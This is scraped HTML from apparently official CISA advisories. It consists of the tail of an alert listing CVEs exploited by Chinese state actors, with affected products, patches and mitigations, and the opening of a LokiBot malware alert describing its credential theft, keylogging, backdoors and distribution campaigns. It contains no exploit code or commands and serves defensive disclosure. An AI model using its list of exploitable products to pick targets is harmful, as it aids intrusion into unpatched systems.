href="https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF">21</a>]</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 837.9px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 115px;"><strong>Vulnerability</strong></th> <th scope="col" style="width: 247px;"><strong>Vulnerable Products</strong></th> <th scope="col" style="width: 455px;"><strong>Patch Information</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8193">CVE-2020-8193</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18</li> <li>Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://support.citrix.com/article/CTX276688">Citrix Security Bulletin CTX276688</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8195">CVE-2020-8195</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18</li> <li>Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://support.citrix.com/article/CTX276688">Citrix Security Bulletin CTX276688</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8196">CVE-2020-8196</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Citrix ADC and Citrix Gateway versions before 13.0-58.30, 
12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18</li> <li>Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://support.citrix.com/article/CTX276688">Citrix Security Bulletin CTX276688</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0708">CVE-2019-0708</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows 7 for 32-bit Systems Service Pack 1</li> <li>Windows 7 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 for 32-bit Systems Service Pack 2</li> <li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 for Itanium-Based Systems Service Pack 2</li> <li>Windows Server 2008 for x64-based Systems Service Pack 2</li> <li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708">Microsoft Security Advisory for CVE-2019-0708</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15505">CVE-2020-15505</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>MobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0</li> <li>Sentry versions 9.7.2 and earlier, and 9.8.0</li> <li>Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier</li> </ul> 
</td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.mobileiron.com/en/blog/mobileiron-security-updates-available">MobileIron Blog: MobileIron Security Updates Available</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1350">CVE-2020-1350</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows Server 2008 for 32-bit Systems Service Pack 2</li> <li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 for x64-based Systems Service Pack 2</li> <li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2012 R2 (Server Core installation)</li> <li>Windows Server 2016</li> <li>Windows Server 2016 (Server Core installation)</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1903 (Server Core installation)</li> <li>Windows Server, version 1909 (Server Core installation)</li> <li>Windows Server, version 2004 (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350">Microsoft Security Advisory for CVE-2020-1350</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> 
<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2016</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1903 (Server Core installation)</li> <li>Windows Server, version 1909 (Server Core installation)</li> <li>Windows Server, version 2004 (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">Microsoft Security Advisory for CVE-2020-1472</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1040">CVE-2020-1040</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2012 R2 (Server Core installation)</li> <li>Windows Server 2016</li> <li>Windows Server 2016 (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040">Microsoft Security Advisory for CVE-2020-1040</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-6789">CVE-2018-6789</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Exim before 4.90.1</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a 
href="https://exim.org/static/doc/security/CVE-2018-6789.txt">Exim page for CVE-2018-6789</a></li> <li><a href="https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1">Exim patch information for CVE-2018-6789</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-0688">CVE-2020-0688</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30</li> <li>Microsoft Exchange Server 2013 Cumulative Update 23</li> <li>Microsoft Exchange Server 2016 Cumulative Update 14</li> <li>Microsoft Exchange Server 2016 Cumulative Update 15</li> <li>Microsoft Exchange Server 2019 Cumulative Update 3</li> <li>Microsoft Exchange Server 2019 Cumulative Update 4</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688">Microsoft Security Advisory for CVE-2020-0688</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-4939">CVE-2018-4939</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>ColdFusion Update 5 and earlier versions</li> <li>ColdFusion 11 Update 13 and earlier versions</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html">Adobe Security Bulletin APSB18-14</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2015-4852">CVE-2015-4852</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a 
href="https://www.oracle.com/security-alerts/cpuoct2016.html">Oracle Critical Patch Update Advisory - October 2016</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-2555">CVE-2020-2555</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Oracle Coherence product of Oracle Fusion Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.oracle.com/security-alerts/cpujan2020.html">Oracle Critical Patch Update Advisory - January 2020</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-3396">CVE-2019-3396</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://jira.atlassian.com/browse/CONFSERVER-57974">Jira Atlassian Confluence Server and Data Center: Remote code execution via Widget Connector macro - CVE-2019-3396</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11580">CVE-2019-11580</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Atlassian Crowd and Crowd Data Center from version 2.1.0 before 3.0.5, from version 3.1.0 before 3.1.6, from version 3.2.0 before 3.2.8, from version 3.3.0 before 3.3.5, and from version 3.4.0 before 3.4.4</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://jira.atlassian.com/browse/CWD-5388">Jira Atlassian Crowd: Crowd - pdkinstall development plugin incorrectly enabled - 
CVE-2019-11580</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-10189">CVE-2020-10189</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Zoho ManageEngine Desktop Central before 10.0.474</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html">ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-18935">CVE-2019-18935</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Progress Telerik UI for ASP.NET AJAX through 2019.3.1023</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization">Telerik: ASP.NET AJAX: Allows JavaScriptSerializer Deserialization</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-0601">CVE-2020-0601</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows 10 for 32-bit Systems</li> <li>Windows 10 for x64-based Systems</li> <li>Windows 10 Version 1607 for 32-bit Systems</li> <li>Windows 10 Version 1607 for x64-based Systems</li> <li>Windows 10 Version 1709 for 32-bit Systems</li> <li>Windows 10 Version 1709 for ARM64-based Systems</li> <li>Windows 10 Version 1709 for x64-based Systems</li> <li>Windows 10 Version 1803 for 32-bit Systems</li> <li>Windows 10 Version 1803 for ARM64-based Systems</li> <li>Windows 10 Version 1803 for x64-based Systems</li> <li>Windows 10 Version 1809 for 32-bit Systems</li> <li>Windows 10 Version 1809 for ARM64-based Systems</li> <li>Windows 10 
Version 1809 for x64-based Systems</li> <li>Windows 10 Version 1903 for 32-bit Systems</li> <li>Windows 10 Version 1903 for ARM64-based Systems</li> <li>Windows 10 Version 1903 for x64-based Systems</li> <li>Windows 10 Version 1909 for 32-bit Systems</li> <li>Windows 10 Version 1909 for ARM64-based Systems</li> <li>Windows 10 Version 1909 for x64-based Systems</li> <li>Windows Server 2016</li> <li>Windows Server 2016 (Server Core installation)</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1803 (Server Core Installation)</li> <li>Windows Server, version 1903 (Server Core installation)</li> <li>Windows Server, version 1909 (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601">Microsoft Security Advisory for CVE-2020-0601</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0803">CVE-2019-0803</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows 10 for 32-bit Systems</li> <li>Windows 10 for x64-based Systems</li> <li>Windows 10 Version 1607 for 32-bit Systems</li> <li>Windows 10 Version 1607 for x64-based Systems</li> <li>Windows 10 Version 1703 for 32-bit Systems</li> <li>Windows 10 Version 1703 for x64-based Systems</li> <li>Windows 10 Version 1709 for 32-bit Systems</li> <li>Windows 10 Version 1709 for ARM64-based Systems</li> <li>Windows 10 Version 1709 for x64-based Systems</li> <li>Windows 10 Version 1803 for 32-bit Systems</li> <li>Windows 10 Version 1803 for ARM64-based Systems</li> <li>Windows 10 Version 1803 for x64-based Systems</li> <li>Windows 10 Version 1809 for 32-bit Systems</li> <li>Windows 10 Version 1809 for ARM64-based Systems</li> <li>Windows 10 Version 1809 for x64-based Systems</li> <li>Windows 7 for 32-bit Systems 
Service Pack 1</li> <li>Windows 7 for x64-based Systems Service Pack 1</li> <li>Windows 8.1 for 32-bit systems</li> <li>Windows 8.1 for x64-based systems</li> <li>Windows RT 8.1</li> <li>Windows Server 2008 for 32-bit Systems Service Pack 2</li> <li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 for Itanium-Based Systems Service Pack 2</li> <li>Windows Server 2008 for x64-based Systems Service Pack</li> <li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2012 R2 (Server Core installation)</li> <li>Windows Server 2016</li> <li>Windows Server 2016 (Server Core installation)</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1803 (Server Core Installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803">Microsoft Security Advisory for CVE-2019-0803</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-6327">CVE-2017-6327</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Symantec Messaging Gateway before 10.6.3-267</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&amp;pvid=security_advisory&amp;year=&amp;suid=20170810_00">Broadcom Security Updates Detail 
for CVE-2017-6327 and CVE-2017-6328</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-3118">CVE-2020-3118</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>ASR 9000 Series Aggregation Services Routers</li> <li>Carrier Routing System (CRS)</li> <li>IOS XRv 9000 Router</li> <li>Network Convergence System (NCS) 540 Series Routers</li> <li>NCS 560 Series Routers</li> <li>NCS 1000 Series Routers</li> <li>NCS 5000 Series Routers</li> <li>NCS 5500 Series Routers</li> <li>NCS 6000 Series Routers</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce">Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8515">CVE-2020-8515</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/">Draytek Security Advisory: Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515)</a></li> </ul> </td> </tr> </tbody> </table> <ol start="2"> <li><strong>Implement rigorous configuration management programs. </strong>Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. 
Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks.</li> <li><strong>Disable unnecessary ports, protocols, and services.</strong> Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell).</li> <li><strong>Enhance monitoring of network and email traffic.</strong> Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse.</li> <li><strong>Use protection capabilities to stop malicious activity.</strong> Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.</li> </ol> <h3>Contact Information</h3><p>CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:</p> <ul> <li>1-888-282-0870 (From outside the United States: +1-703-235-8832)</li> <li><a href="mailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a> (UNCLASS)</li> </ul> <p>CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. 
Reporting forms can be found on the CISA homepage at <a href="http://www.us-cert.cisa.gov/">http://www.us-cert.cisa.gov/</a>.</p> <h3>References</h3> <ul> <li><a href="https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf">[1] White House Publication: How China’s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World </a></li> <li><a href="https://fas.org/sgp/crs/row/IF10964.pdf">[2] Congressional Research Services: 'Made in China 2025' Industrial Policies: Issues for Congress </a></li> <li><a href="https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade">[3] Council on Foreign Relations: Is ‘Made in China 2025’ a Threat to Global Trade </a></li> <li><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">[4] Mandiant: APT1 Exposing One of China’s Cyber Espionage Units </a></li> <li><a href="https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor">[5] U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/TA17-117A">[6] CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors</a></li> <li><a href="https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers">[7] DOJ Press Release: Deputy Attorney General Rod J. 
Rosenstein Announces Charges Against Chinese Hackers</a></li> <li><a href="https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf">[8] CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers</a></li> <li><a href="https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military">[9] DOJ Press Release: Deputy Attorney General William P. Barr Announces Indictment of Four Members of China’s Military for Hacking into Equifax</a></li> <li><a href="https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations">[10] CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations </a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/AA20126A">[11] CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services</a></li> <li><a href="https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity">[12] CISA Current Activity (CA): Chinese Malicious Cyber Activity</a></li> <li><a href="https://www.fireeye.com/current-threats/apt-groups.html">[13] FireEye Advanced Persistent Threat Groups</a></li> <li><a href="https://attack.mitre.org/groups/G0022/">[14] MITRE ATT&amp;CK: APT3</a></li> <li><a href="https://attack.mitre.org/groups/G0073/">[15] MITRE ATT&amp;CK: APT19</a></li> <li><a href="https://attack.mitre.org/groups/G0096/">[16] MITRE ATT&amp;CK: APT41</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-133a">[17] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-020a">[18] CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP</a></li> <li><a 
href="https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve">[19] CISA CA: F5 Releases Security Advisory for BIG-IP TMUI RCE Vulnerability, CVE-2020-5902</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-133a">[20] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities</a></li> <li><a href="https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF">[21] NSA Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 1, 2020: Initial Version</li> <li>October 20, 2020: Recommended Actions Section Updated</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-266A: LokiBot Malware
Original release date: September 22, 2020 | Last revised: October 24, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/matrices/enterprise/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor techniques.</em></p> <p>This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions by the <a href="https://www.cisecurity.org/ms-isac/">Multi-State Information Sharing &amp; Analysis Center (MS-ISAC)</a>.</p> <p>CISA has observed a notable increase in the use of LokiBot malware by malicious cyber actors since July 2020. Throughout this period, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected persistent malicious LokiBot activity. LokiBot is credential- and information-stealing malware, often sent as a malicious attachment; it is known for being simple yet effective, which makes it an attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases.</p> <h3>Technical Details</h3><p>LokiBot—also known as Lokibot, Loki PWS, and Loki-bot—employs Trojan malware to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials.</p> <ul> <li>The malware steals credentials through the use of a keylogger to monitor browser and desktop activity (<em>Credentials from Password Stores</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/">T1555</a>]). 
<ul> <li>(<em>Credentials from Password Stores: Credentials from Web Browsers</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/003">T1555.003</a>])</li> <li>(<em>Input Capture: Keylogging</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1056/001">T1056.001</a>])</li> </ul> </li> <li>LokiBot can also create a backdoor into infected systems to allow an attacker to install additional payloads (<em>Event Triggered Execution: Accessibility Features</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/008/">T1546.008</a>]).</li> <li>Malicious cyber actors typically use LokiBot to target Windows and Android operating systems and distribute the malware via email, malicious websites, text, and other private messages (<em>User Execution: Malicious File</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1204/002/">T1204.002</a>]). See figure 1 for enterprise techniques used by LokiBot.</li> </ul> <p data-entity-type="" data-entity-uuid="" style="text-align: center;"><span><img alt="Figure 1: MITRE ATT&amp;CK enterprise techniques used by LokiBot" data-entity-type="" data-entity-uuid="" height="655" src="https://us-cert.cisa.gov/sites/default/files/2020-09/091520_LokiBot_Malware_Alert.png" width="1064" /></span></p> <p class="text-align-center"><em>Figure 1: MITRE ATT&amp;CK enterprise techniques used by LokiBot</em></p> <p>Since LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications, including the following.</p> <ul> <li><strong>February 2020: </strong>Trend Micro identified cyber actors using LokiBot to impersonate a launcher for Fortnite—a popular video game.[<a href="https://blog.trendmicro.com/trendlabs-security-intelligence/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file/">1</a>]</li> <li><strong>August 2019: </strong>FortiGuard SE researchers discovered a malspam campaign distributing LokiBot information-stealing payloads in a spearphishing attack on a 
U.S. manufacturing company.[<a href="https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot#:~:text=The%20FortiGuard%20Labs%20SE%20team%20identified%20a%20new,manufacturing%20company%20utilizing%20the%20well%20documented%20infostealer%20LokiBot.">2</a>]</li> <li><strong>August 2019:</strong> Trend Micro researchers reported LokiBot malware source code being hidden in image files spread as attachments in phishing emails.[<a href="https://www.zdnet.com/article/lokibot-information-stealer-now-hides-malware-in-image-files/">3</a>]</li> <li><strong>June 2019: </strong>Netskope uncovered LokiBot being distributed in a malspam campaign using ISO image file attachments.[<a href="https://www.securityweek.com/lokibot-and-nanocore-malware-distributed-iso-image-files">4</a>]</li> <li><strong>April 2019:</strong> Netskope uncovered a phishing campaign using malicious email attachments with LokiBot malware to create backdoors onto infected Windows systems and steal sensitive information.[<a href="https://www.netskope.com/blog/lokibot-nanocore-iso-disk-image-files">5</a>]</li> <li><strong>February 2018: </strong>Trend Micro discovered CVE-2017-11882 being exploited in an attack using Windows Installer service to deliver LokiBot malware.[<a href="https://www.trendmicro.com/en_us/research/18/b/attack-using-windows-installer-msiexec-exe-leads-lokibot.html">6</a>]</li> <li><strong>October 2017:</strong> SfyLabs identified cyber actors using LokiBot as an Android banking trojan that turns into ransomware.[<a href="https://www.bleepingcomputer.com/news/security/lokibot-android-banking-trojan-turns-into-ransomware-when-you-try-to-remove-it/">7</a>]</li> <li><strong>May 2017: </strong>Fortinet reported malicious actors using a PDF file to spread a new LokiBot variant capable of stealing credentials from more than 100 different software tools.[<a href="https://www.fortinet.com/blog/threat-research/new-loki-variant-being-spread-via-pdf-file">8</a>]</li> 
